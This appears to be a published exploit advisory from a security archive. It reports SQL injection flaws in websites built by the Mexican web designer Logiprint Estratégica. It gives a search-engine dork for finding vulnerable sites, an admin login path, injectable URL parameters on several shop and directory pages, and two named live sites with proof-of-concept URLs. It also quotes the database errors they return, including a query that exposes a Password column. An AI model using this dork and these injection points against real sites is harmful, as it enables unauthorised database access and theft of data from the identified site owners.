Designed by Logiprint Estratégica Mexico SQL Injection Vulnerability

2018.09.16
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:''Designed by Logiprint Estratégica''

################################################################################################# # Exploit Title : Designed by Logiprint Estratégica Mexico SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 14/09/2018 # Vendor Homepage : logiprint.com.mx # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Designed by Logiprint Estratégica'' intext:''Copyright © 2016 Designed by Logiprint Estratégica'' # Admin Login Panel Path => /mi_cuenta/ # Exploit : /shop-sidebar.php?idcategoria=[SQL Injection] /shop-product-detail2.php?idproducto=&idcategoria=[SQL Injection] /shop-product-detail2.php?idproducto=[ID-Number]&idpadre=&idcategoria=[SQL Injection] /directorio.php?records_per_page=[ID-Number]&p=[ID-Number]&texto_buscar=&primer=[ID-Number]&segundo=[ID-Number]&tercer=[SQL Injection] ################################################################################################# # Example Sites => platoro.com.mx/shop-sidebar.php?idcategoria=8%27 => [ Proof of Concept ] => archive.is/6ZrBZ galeriajoyera.com.mx/directorio.php?records_per_page=96&p=1&texto_buscar=&primer=5&segundo=2&tercer=24%27 => [ Proof of Concept ] => archive.is/hIMNh # SQL Database Errors => Error: [SELECT idcategorias, idpadre, nombreesp, nombreing, descripcion, imagen, orden, activo FROM logiprint_ultimascate WHERE idcategorias=8' ORDER BY orden ASC]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY orden ASC' at line 1Error: [SELECT idbanner, imagenesp, imagening, idcategorias, nombre, publicado FROM logiprint_banner WHERE idcategorias = ] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND activo=1 ORDER BY local ASC' at line 1Error: [SELECT iddirectorio, nombrecomercial, logo, imgpublica, img1, img2, img3, idpiso, local, idmetal, idcategorias, telefono, telefono1, telefonomovil, paginaweb, emailcontacto, Password, urlf, urlt, urlg, urli, urly, urlp, urlv, describ, activo FROM logiprint_directorio WHERE iddirectorio IN(96,97,161) AND iddirectorio IN(3,6,8,10,16,25,30,33,47,53,55,56,81,88,90,91,92, 95,100,101,104,105,111,112,113,116,117,124,127,130,135,139,140,145,148,150,151,176,177,181,182) AND iddirectorio IN() AND activo=1 ORDER BY local ASC LIMIT 0, 96 ]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND activo=1 ORDER BY local ASC LIMIT 0, 96' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-designed-by-logiprint-estrat%C3%A9gica-mexico-sql-inj-vuln.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top